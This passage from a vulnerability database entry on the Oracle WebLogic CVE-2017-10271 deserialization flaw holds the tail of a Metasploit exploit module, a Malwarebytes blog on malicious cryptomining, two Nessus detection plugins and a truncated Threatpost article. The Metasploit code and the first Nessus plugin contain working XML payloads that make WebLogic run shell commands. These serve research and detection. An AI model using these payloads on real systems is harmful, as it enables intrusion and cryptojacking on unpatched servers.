'Windows'\n string0_cmd = 'cmd.exe'\n string1_param = '/c'\n shell_payload = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true, encoded: false })\n when 'Unix','Solaris'\n string0_cmd = '/bin/bash'\n string1_param = '-c'\n shell_payload = payload.encoded\n end\n\n random_action = rand_text_alphanumeric(20)\n random_relates = rand_text_alphanumeric(20)\n\n soap_payload = %Q|<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"|\n soap_payload << %Q|xmlns:wsa=\"http://www.w3.org/2005/08/addressing\"|\n soap_payload << %Q|xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\">|\n soap_payload << %Q|<soapenv:Header>|\n soap_payload << %Q|<wsa:Action>#{random_action}</wsa:Action>|\n soap_payload << %Q|<wsa:RelatesTo>#{random_relates}</wsa:RelatesTo>|\n soap_payload << %Q|<work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">|\n soap_payload << %Q|<void class=\"java.lang.ProcessBuilder\">|\n soap_payload << %Q|<array class=\"java.lang.String\" length=\"3\">|\n soap_payload << %Q|<void index=\"0\">|\n soap_payload << %Q|<string>#{string0_cmd}</string>|\n soap_payload << %Q|</void>|\n soap_payload << %Q|<void index=\"1\">|\n soap_payload << %Q|<string>#{string1_param}</string>|\n soap_payload << %Q|</void>|\n soap_payload << %Q|<void index=\"2\">|\n soap_payload << %Q|<string>#{shell_payload.encode(xml: :text)}</string>|\n #soap_payload << %Q|<string>#{xml_encode(shell_payload)}</string>|\n soap_payload << %Q|</void>|\n soap_payload << %Q|</array>|\n soap_payload << %Q|<void method=\"start\"/>|\n soap_payload << %Q|</void>|\n soap_payload << %Q|</work:WorkContext>|\n soap_payload << %Q|</soapenv:Header>|\n soap_payload << %Q|<soapenv:Body>|\n soap_payload << %Q|<asy:onAsyncDelivery/>|\n soap_payload << %Q|</soapenv:Body>|\n soap_payload << %Q|</soapenv:Envelope>|\n\n print_status(\"Sending payload...\")\n\n begin\n res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path),\n 'method' => 'POST',\n 'ctype' => 'text/xml',\n 'data' => soap_payload,\n 'headers' => {'SOAPAction' => '' }\n )\n rescue Errno::ENOTCONN\n fail_with(Failure::Disconnected, \"The target forcibly closed the connection, and is likely not vulnerable.\")\n end\n\n if res.nil?\n fail_with(Failure::Unreachable, \"No response from host\")\n elsif res && res.code != 202\n fail_with(Failure::UnexpectedReply,\"Exploit failed. Host did not responded with HTTP code #{res.code} instead of HTTP code 202\")\n end\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb"}], "malwarebytes": [{"lastseen": "2018-02-26T16:50:59", "bulletinFamily": "blog", "cvelist": ["CVE-2017-10271"], "description": "While cryptocurrencies have been around for a long time and used for legitimate purposes, online criminals have certainly tarnished their reputation. Unfortunately, the same benefits offered by these decentralized and somewhat anonymous digital currencies were quickly abused to extort money, as was the case during the various ransomware outbreaks we\u2019ve witnessed in the last few years.\n\nAs the value of cryptocurrencies\u2014driven by the phenomenal rise of Bitcoin\u2014has increased significantly, a new kind of threat has become mainstream, and some might say has even surpassed all other cybercrime. Indeed, cryptocurrency mining is such a lucrative business that malware creators and distributors the world over are drawn to it like moths to a flame. The emergence of a multitude of new cryptocurrencies that can be mined by average computers has also contributed to the widespread abuse we are witnessing.\n\nMalwarebytes has been blocking coin miners with its multiple protection modules, including our real-time scanner and web protection technology. Ever since September 2017, malicious cryptomining has been our top detection overall.\n\n### Cryptomining malware\n\nTo maximize their profits, threat actors are leveraging the computing power of as many devices as they can. But first, they must find ways to deliver the malicious coin miners on a large enough scale.\n\nWhile the Wannacry ransomware was highly publicized for taking advantage of the leaked EternalBlue and DoublePulsar exploits, at least [two different groups](<https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-making-millions-operators>) used those same vulnerabilities to infect hundreds of thousands of Windows servers with a cryptocurrency miner, ultimately generating millions of dollars in revenue.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/IP__scan-1.png> \"\" )\n\n_Figure 1: Worm scanning random IP addresses on port 445 _\n\nOther vulnerabilities, such as a flaw with Oracle's WebLogic Server ([CVE-2017-10271](<https://www.cvedetails.com/cve/CVE-2017-10271/>)), were also used to deliver miners onto servers at [universities and research institutions](<https://www.ren-isac.net/public-resources/alerts/REN-ISAC_ADVISORY_Oracle_WebLogic_Vulnerability_Bitcoin_Miner_Attacks_20180105v1.pdf>). While Oracle released a [patch](<https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html>) in October 2017, many did not apply it in a timely fashion, and a [PoC](<https://github.com/Luffin/CVE-2017-10271>) only facilitated widespread abuse.\n\nAs it turns out, servers happen to be a favorite among criminals because they offer the most horsepower, or to use the proper term, the highest hash rate to crunch through and solve the mathematical operations required by cryptomining. In recent times, we saw individuals who, against their better judgement, took this to the next level by using supercomputers in various [critical infrastructure](<https://www.wired.com/story/cryptojacking-critical-infrastructure/>) environments.\n\n### Spam and exploit kits campaigns\n\nEven malware authors have caught the cryptocurrency bug. Existing malware families like Trickbot, distributed via malicious spam attachments, temporarily added in a [coin miner module](<https://twitter.com/VK_Intel/status/959194022735523841>).\n\nInterestingly, the Trickbot authors had already expanded their banking Trojan to [steal credentials from Coinbase users](<https://blogs.forcepoint.com/security-labs/trickbot-goes-after-cryptocurrency>) as they logged into their electronic wallet. The modular nature of their malware is certainly making it easier for them to experiment with new schemes to make money.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Spam-1.png> \"\" )\n\n_Figure 2: Document containing macro that downloads the TrickBot malware_\n\nSeveral exploit kits, and [RIG EK](<https://blog.malwarebytes.com/threat-analysis/2018/01/rig-exploit-kit-campaign-gets-deep-into-crypto-craze/>) in particular have been distributing miners, usually via the intermediary of the SmokeLoader malware. In fact, cryptominers are one of the most commonly served payloads in drive-by download attacks.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/RIG_miner-1.png> \"\" )\n\n_Figure 3: An iframe redirection to RIG EK followed by a noticeable coin miner infection_\n\n### Mobile and Mac cryptominers\n\nMobile users are not immune to cryptomining either, as [Trojanized apps laced with mining code](<https://blog.malwarebytes.com/cybercrime/2018/02/bogus-hack-apps-hack-users-back-for-cryptocash/>) are also commonplace, especially for the Android platform. Similarly to Windows malware, malicious APKs tend to have modules for specific functionalities, such as SMS spam and of course miners.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Android-1.jpg> \"\" )\n\n_Figure 4: Source code for the mining component within an Android APK_\n\nLegitimate mining pools such as [Minergate](<https://en.bitcoin.it/wiki/MinerGate>) are often used by those Android miners, and the same is true for [Mac cryptominers](<https://blog.malwarebytes.com/threat-analysis/2018/02/new-information-unfolds-regarding-mac-cryptominer/>). The usual advice on sticking to official websites to download applications applies but is not always enough, especially when [trusted applications get hacked](<https://blog.malwarebytes.com/threat-analysis/2018/02/new-mac-cryptominer-distributed-via-a-macupdate-hack/>).\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Mac-1.png> \"\" )\n \n \n ~/Library/Apple/Dock -user sarahmayergo1990@gmail.com@gmail.com -xmr\n\n_Figure 5: Malicious Mac application launching a Monero miner_\n\n### Drive-by cryptomining\n\nIn mid-September 2017, a mysterious entity called Coinhive launched a new service that was about to create chaos on the web, as it introduced an API to mine the Monero currency directly within the browser.\n\nWhile in-browser miners have taken off because of Coinhive's popularity, they had already been tested a few years ago, mostly as proof-of-concepts that did not develop much further. There is, however, the legal precedent of a [group of students at MIT](<https://venturebeat.com/2014/02/12/new-jersey-slaps-mit-bitcoin-hackers-with-subpoena-and-theyre-fighting-back/>) who got sued by the state of New Jersey for their coin mining attempt\u2014called Tidbit\u2014proposed as an alternative to traditional display advertising.\n\n#### **No opt-in by default**\n\nWithin weeks, the Coinhive API, void of any safeguards, was abused in drive-by cryptomining attacks. Similar to drive-by downloads, [drive-by mining](<https://blog.malwarebytes.com/cybercrime/2017/11/a-look-into-the-global-drive-by-cryptocurrency-mining-phenomenon/>) is an automated, silent, and platform agnostic technique that forces visitors to a website to mine for cryptocurrency.\n\nWe witnessed an interesting [campaign](<https://blog.malwarebytes.com/threat-analysis/2018/02/drive-by-cryptomining-campaign-attracts-millions-of-android-users/>) that was specifically designed for Android and drew millions of users to pages that immediately started to mine for Monero under the pretense of recouping server costs. Even though mobile devices aren't as powerful as desktops, let alone servers, this event showed that no one is immune to drive-by mining.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Android_Drive_by-mining-1-1.png> \"\" )\n\n_Figure 6: An in-browser miner for Chrome on Android _\n\n[Malvertising](<https://blog.malwarebytes.com/threat-analysis/2017/09/drive-by-mining-and-ads-the-wild-wild-west/>) was once again a major factor in spreading coin miners to a large audience, as we saw with the [YouTube case](<https://twitter.com/Mystic_Ervo/status/956237422391709696>) that involved malicious ads via DoubleClick. Another interesting vector, which security people have warned about for years, is the use of third-party scripts that have become ubiquitous. A company called Texthelp had one of their [plugins compromised](<https://www.troyhunt.com/the-javascript-supply-chain-paradox-sri-csp-and-trust-in-third-party-libraries/>) and injected with a Coinhive script, leading to hundreds of government websites in the UK unwillingly participating in malicious cryptomining activity.\n\nTo fend off criticism, Coinhive introduced a new API (AuthedMine) that explicitly requires user input for any mining activity to be allowed. The idea was that considerate website owners would use this more \u201cethical\u201d API instead, so that their visitors can knowingly opt-in or out before engaging in cryptomining. This was also an argument that Coinhive put forward to defend its stance against ad blockers and antivirus products.\n\nWhile only Coinhive themselves would have accurate statistics, according to our own telemetry the opt-in version of their API was barely used (40K/day) in comparison to the silent one (3M/day), as pictured in the below histograms during the period of January 10 to February 6.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Coinhive_opt-in-1.png> \"\" )\n\n_Figure 7: Usage statistics for the opt-in version of Coinhive_\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Coinhive_silent_drive-by-1.png> \"\" )\n\n_Figure 8: Usage statistics for the silent version of Coinhive_\n\nMoreover, even websites that do use the opt-in option may still be crippling machines by running an unthrottled miner, as was the case with popular[ American news website Salon](<https://twitter.com/jonathansampson/status/963465011153833984>)[[.]com](<https://twitter.com/jonathansampson/status/963465011153833984>).\n\n#### **Copycats**\n\nSeveral copycats emerged in the wake of Coinhive's immediate success. According to our stats, _coin-have[.]com_ is the second most popular service, followed by _crypto-loot[.]com_. While Coinhive takes a 30 percent commission on all mining earnings, Coin Have advertises the lowest commission rates in the market at 20 percent, although CryptoLoot itself claims to pay out 88 percent of mined commissions.\n\nIn additions to bigger payouts, other \u201cattractive\u201d features pushed by newcomers are low payment thresholds and the ability to bypass ad blockers, which they often view as their number one threat.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/copycats-1.png> \"\" )\n\n_Figure 9: Two of the most popular Coinhive copycats_\n\n#### **Browsers and technologies abused**\n\nContrary to malware-based coin miners, drive-by cryptomining does not require infecting a machine. This is both a strength and weakness in the sense that it can potentially reach a much wider audience but is also more ephemeral in nature.\n\nFor example, if a user navigates away from the website they are on or closes the offending tab, that will cause the mining activity to stop, which is a major drawback. However, we observed that some miners have developed sneaky ways of making drive-by mining [persistent](<https://blog.malwarebytes.com/cybercrime/2017/11/persistent-drive-by-cryptomining-coming-to-a-browser-near-you/>), thanks to the use of pop-unders, a practice well-known in the ad fraud business. To add insult to injury, the malicious pop-under tab containing the mining code would get placed right underneath the taskbar, rendering it virtually invisible to the end user. Thanks to this trick, the mining can carry on until the user actually restarts their computer.\n\nAnother way to mine for long and uninterrupted periods of time is by using a booby-trapped browser extension that will inject code in each web session. This is what happened to the Archive Poster extension because one of their developers had his Google account credentials compromised.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/extension-1.png> \"\" )\n\n_Figure 10: The compromised extension with a rogue JavaScript for Coinhive_\n\nIt is worth noting that JavaScript is not the only way to mine for coins within the browser. Indeed, we have observed WebAssembly, a newer format available in modern browsers, being used more and more. WebAssembly modules have the advantage of running at near native speed, making them a lot faster and more efficient than JavaScript.\n \n \n | payload =\n \u00a0 - [ ExportSection\n \u00a0\u00a0\u00a0 | count = 27\n \u00a0\u00a0\u00a0 | entries =\n \u00a0\u00a0\u00a0 - [ ExportEntry\n \u00a0\u00a0\u00a0\u00a0\u00a0 | field_len = 9\n \u00a0\u00a0\u00a0\u00a0\u00a0 | field_str = \"stackSave\"\n \u00a0\u00a0\u00a0\u00a0\u00a0 | kind = 0x0\n \u00a0\u00a0\u00a0\u00a0\u00a0 | index = 71\n \u00a0\u00a0\u00a0 - [ ExportEntry\n \u00a0\u00a0\u00a0\u00a0\u00a0 | field_len = 17\n \u00a0\u00a0\u00a0\u00a0\u00a0 | field_str = \"_cryptonight_hash\"\n \u00a0\u00a0\u00a0\u00a0\u00a0 | kind = 0x0\n \u00a0\u00a0\u00a0\u00a0\u00a0 | index = 70\n\n_Figure 11: Code snippet from a WebAssembly module designed for mining Monero_\n\nWhile drive-by mining typically happens via the standard HTTP protocol\u2014either via HTTP or HTTPS connections\u2014we have witnessed more and more examples of miners communicating via WebSockets instead.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/websocket_-1.png> \"\" )\n\n_Figure 12: A Web Socket connection to Coinhive_\n\nA WebSocket is another communication protocol that allows streams of data to be exchanged. There is an initial handshake request and response with a remote server followed by the actual data streams. Coin mining code wrapped within a secure (wss) WebSocket is more difficult to identify and block.\n\n### Conclusion\n\nAs the threat landscape continues to evolve, its connections to real-world trends become more and more obvious. Malware authors are not only enjoying the relative anonymity provided by digital currencies but also want to amass them.\n\nCryptomining malware provides a good use case for leveraging the size and power of a botnet in order to perform CPU-intensive mining tasks without having to bear the costs incurred in the process. In some aspect, drive-by mining also applies the same concept, except that the botnet of web users it creates is mostly temporary.\n\nWhile malicious cryptomining appears to be far less dangerous to the user than ransomware, its effects should not be undermined. Indeed, unmanaged miners could seriously disrupt business or infrastructure critical processes by overloading systems to the point where they become unresponsive and shut down. Under the disguise of a financially-motivated attack, this could be the perfect alibi for advanced threat actors.\n\nMalwarebytes users, regardless of their platform, are protected against unwanted cryptomining, whether it is done via malware or the web.\n\nThe post [The state of malicious cryptomining](<https://blog.malwarebytes.com/cybercrime/2018/02/state-malicious-cryptomining/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "modified": "2018-02-26T16:08:03", "published": "2018-02-26T16:08:03", "href": "https://blog.malwarebytes.com/cybercrime/2018/02/state-malicious-cryptomining/", "id": "MALWAREBYTES:B49179B9854ECB9B3B25403D4C9D0804", "type": "malwarebytes", "title": "The state of malicious cryptomining", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "nessus": [{"lastseen": "2021-02-01T07:39:34", "description": "The remote Oracle WebLogic server is affected by a remote code\nexecution vulnerability in the WSAT endpoint due to unsafe\ndeserialization of XML encoded Java objects. An unauthenticated,\nremote attacker can exploit this, via a crafted Java object, \nto execute arbitrary Java code in the context of the WebLogic\nserver.", "edition": 34, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2017-12-28T00:00:00", "title": "Oracle WebLogic WSAT Remote Code Execution", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-10271"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:oracle:weblogic_server"], "id": "WEBLOGIC_2017_10271.NASL", "href": "https://www.tenable.com/plugins/nessus/105484", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105484);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2019/11/08\");\n\n script_cve_id(\"CVE-2017-10271\");\n\n script_name(english:\"Oracle WebLogic WSAT Remote Code Execution\");\n script_summary(english:\"Sends an HTTP POST request and looks for DNS response\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle WebLogic server is affected by a remote code\nexecution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Oracle WebLogic server is affected by a remote code\nexecution vulnerability in the WSAT endpoint due to unsafe\ndeserialization of XML encoded Java objects. An unauthenticated,\nremote attacker can exploit this, via a crafted Java object, \nto execute arbitrary Java code in the context of the WebLogic\nserver.\");\n # https://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html#AppendixFMW\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b680917f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the October 2017 Oracle\nCritical Patch Update advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-10271\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Oracle WebLogic wls-wsat Component Deserialization RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:weblogic_server\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"weblogic_detect.nasl\");\n script_require_keys(\"www/weblogic\");\n script_require_ports(\"Services/www\", 80, 7001);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nappname = \"Oracle WebLogic Server\";\n\nget_kb_item_or_exit(\"www/weblogic\");\nport = get_http_port(default:7001, embedded:FALSE);\nget_kb_item_or_exit(\"www/weblogic/\" + port + \"/installed\");\n\n# establish if WSAT is enabled. If it isn't then we don't\n# need to proceed any futher\nres = http_send_recv3(\n method:'GET',\n item:'/wls-wsat/CoordinatorPortType',\n port:port,\n exit_on_fail:TRUE);\nif (empty_or_null(res) || '404' >< res[0])\n{\n audit(AUDIT_INST_VER_NOT_VULN, appname);\n}\n\n# generate a unique pattern for each execution. unixtime() is not\n# granular enough since there may be many installs and this script\n# could be running in parallel\npattern = hexstr(rand_str(length:8));\n\n# create the HTTP request that will execute the DNS lookup. We'll try to execute\n# via both cmd and sh since we have no real insight into the remote OS.\n# Because some minimal Linux installs don't include nslookup, we'll also fallback\n# on using ping if necessary... although I think that is mostly paranoia.\nns_lookup = 'nslookup weblogic-2017-10271-' + pattern + ' ' + compat::this_host();\nxml_encoded_java =\n'<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">' +\n '<soapenv:Header>' +\n '<work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">' +\n '<java>' +\n '<void class=\"java.lang.ProcessBuilder\">' +\n '<array class=\"java.lang.String\" length=\"3\" >' +\n '<void index=\"0\">' +\n '<string>cmd.exe</string>' +\n '</void>' +\n '<void index=\"1\">' +\n '<string>/c</string>' +\n '</void>' +\n '<void index=\"2\">' +\n '<string>' + ns_lookup + '</string>' +\n '</void>' +\n '</array>' +\n '<void method=\"start\"/>' +\n '</void>' +\n '<void class=\"java.lang.ProcessBuilder\">' +\n '<array class=\"java.lang.String\" length=\"3\" >' +\n '<void index=\"0\">' +\n '<string>/bin/sh</string>' +\n '</void>' +\n '<void index=\"1\">' +\n '<string>-c</string>' +\n '</void>' +\n '<void index=\"2\">' +\n '<string>' + ns_lookup + '</string>' +\n '</void>' +\n '</array>' +\n '<void method=\"start\"/>' +\n '</void>' +\n '<void class=\"java.lang.ProcessBuilder\">' +\n '<array class=\"java.lang.String\" length=\"3\" >' +\n '<void index=\"0\">' +\n '<string>/bin/sh</string>' +\n '</void>' +\n '<void index=\"1\">' +\n '<string>-c</string>' +\n '</void>' +\n '<void index=\"2\">' +\n '<string>ping -c 10 -p ' + pattern + ' ' + compat::this_host() + '</string>' +\n '</void>' +\n '</array>' +\n '<void method=\"start\"/>' +\n '</void>' +\n '</java>' +\n '</work:WorkContext>' +\n '</soapenv:Header>' +\n '<soapenv:Body/>' +\n'</soapenv:Envelope>';\nrequest =\n 'POST /wls-wsat/CoordinatorPortType HTTP/1.1\\r\\n' +\n 'Host: ' + get_host_ip() + ':' + port + '\\r\\n' +\n 'Content-Type: text/xml\\r\\n' +\n 'Content-Length: ' + len(xml_encoded_java) + '\\r\\n' +\n '\\r\\n' +\n xml_encoded_java;\n\nsoc = open_sock_tcp(port);\nif (!soc)\n{\n audit(AUDIT_SOCK_FAIL, port, appname);\n}\n\nfilter = \"(ip and udp and port 53 and src host \" + get_host_ip() + \") or (icmp and icmp[0] = 8 and src host \" + get_host_ip() + \")\";\nresponse = send_capture(socket:soc, data:request, pcap_filter:filter);\nclose(soc);\n\nif (empty_or_null(response))\n{\n # looks like we didn't execute anything on the host\n audit(AUDIT_INST_VER_NOT_VULN, appname);\n}\n\n# We can directly search the DNS response\nif (pattern >!< response)\n{\n # maybe this is an ICMP response?\n icmp_data = tolower(hexstr(get_icmp_element(icmp:response, element:\"data\")));\n if (empty_or_null(icmp_data))\n {\n audit(AUDIT_INST_VER_NOT_VULN, appname);\n }\n\n if (pattern >!< icmp_data)\n {\n # couldn't find the pattern in the ICMP data\n audit(AUDIT_INST_VER_NOT_VULN, appname);\n } \n}\n\nreport =\n '\\nNessus was able to exploit a Java deserialization vulnerability by' +\n '\\nsending a crafted Java object.' +\n '\\n';\nsecurity_report_v4(port:port, severity:SECURITY_WARNING, extra:report);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-02-01T04:58:07", "description": "The version of Oracle WebLogic Server installed on the remote host is\naffected by multiple vulnerabilities", "edition": 34, "cvss3": {"score": 9.9, "vector": "AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H"}, "published": "2017-10-18T00:00:00", "title": "Oracle WebLogic Server Multiple Vulnerabilities (October 2017 CPU)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-10334", "CVE-2017-10152", "CVE-2017-10271", "CVE-2017-10352", "CVE-2017-10336"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:oracle:weblogic_server", "cpe:/a:oracle:fusion_middleware"], "id": "ORACLE_WEBLOGIC_SERVER_CPU_OCT_2017.NASL", "href": "https://www.tenable.com/plugins/nessus/103935", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103935);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\n \"CVE-2017-10152\",\n \"CVE-2017-10271\",\n \"CVE-2017-10334\",\n \"CVE-2017-10336\",\n \"CVE-2017-10352\"\n );\n script_bugtraq_id(101304, 101351, 101392);\n\n script_name(english:\"Oracle WebLogic Server Multiple Vulnerabilities (October 2017 CPU)\");\n script_summary(english:\"Checks for the patch.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application server installed on the remote host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle WebLogic Server installed on the remote host is\naffected by multiple vulnerabilities\");\n # http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1e07fa0e\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the October 2017 Oracle\nCritical Patch Update advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:X\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-10352\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Oracle Weblogic Server Deserialization RCE - AsyncResponseService');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:fusion_middleware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:weblogic_server\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_weblogic_server_installed.nbin\", \"os_fingerprint.nasl\");\n script_require_keys(\"installed_sw/Oracle WebLogic Server\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\napp_name = \"Oracle WebLogic Server\";\n\ninstall = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE);\nohome = install[\"Oracle Home\"];\nsubdir = install[\"path\"];\nversion = install[\"version\"];\n\nfix = NULL;\nfix_ver = NULL;\n\n# individual security patches\nif (version =~ \"^10\\.3\\.6\\.\")\n{\n fix_ver = \"10.3.6.0.171017\";\n fix = \"26519424\";\n}\nelse if (version =~ \"^12\\.1\\.3\\.\")\n{\n fix_ver = \"12.1.3.0.171017\";\n fix = \"26519417\";\n}\nelse if (version =~ \"^12\\.2\\.1\\.1($|[^0-9])\")\n{\n fix_ver = \"12.2.1.1.171017\";\n fix = \"26519400\";\n}\nelse if (version =~ \"^12\\.2\\.1\\.2($|[^0-9])\")\n{\n fix_ver = \"12.2.1.2.171017\";\n fix = \"26485996\";\n}\n\nif (!isnull(fix_ver) && ver_compare(ver:version, fix:fix_ver, strict:FALSE) == -1)\n{\n os = get_kb_item_or_exit(\"Host/OS\");\n if ('windows' >< tolower(os))\n {\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n }\n else port = 0;\n\n report =\n '\\n Oracle home : ' + ohome +\n '\\n Install path : ' + subdir +\n '\\n Version : ' + version +\n '\\n Required Patch : ' + fix +\n '\\n';\n security_report_v4(extra:report, port:port, severity:SECURITY_HOLE);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, subdir);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2019-05-30T05:51:17", "bulletinFamily": "info", "cvelist": ["CVE-2017-10271", "CVE-2017-3066"], "description": "Researchers are warning of a Chinese-language threat actor leveraging a wide array of Git repositories to infect vulnerable systems with Monero-based cryptomining malware.\n\nResearchers at Cisco Talos, who discovered the threat actor they call \u201cRocke\u201d, said they have been tracking the adversary since April as it continues to plant various Monero miners on vulnerable systems. Rocke\u2019s hallmark is the enlisting of toolkits that leverage Git repositories, HTTP File Servers (HFS) and a myriad of different payloads. The name Rocke was derived the the group\u2019s Monero wallet that includes \u201crocke@live.cn\u201d.\n\n\u201cRocke will continue to leverage Git repositories to download and execute illicit mining onto victim machines,\u201d the research team said in a [post](<https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html>) Thursday. \u201cIt is interesting to note that they are expanding their toolset to include browser-based miners, difficult-to-detect trojans, and the Cobalt Strike malware.\u201d\n\nCisco Talos said it first spotted the threat actor in April 2018 when its malware was found in both Western and Chinese honeypots attempting to exploit the an Apache Struts vulnerability.\n\nA user named \u201cc-000\u201d first downloaded several files to the researchers\u2019 Struts 2 honeypot from the Chinese repository site (Gitee.com), researchers said. At the same time another user named \u201cc-18\u201d pulled down files in similar activity from a GitLab.com repository page. The repositories on both Gitee and GitLab were identical, leading researchers to determine they were the same actor. The repositories also contained similar files such as an array of ELF executables, shell scripts, and text files. Each executed and a variety of Monero-based cryptocurrency miners.\n\n\u201cAfter months of research, we believe that Rocke is an actor that must be followed, as they continue to add new features to their malware and are actively exploring new attack vectors,\u201d wrote David Liebenberg, senior threat analyst, who authored the Cisco Talos report.\n\nResearchers said they found the same threat actor exploiting an Oracle WebLogic server vulnerability (CVE-2017-10271), and also exploiting a critical Java deserialization vulnerability in 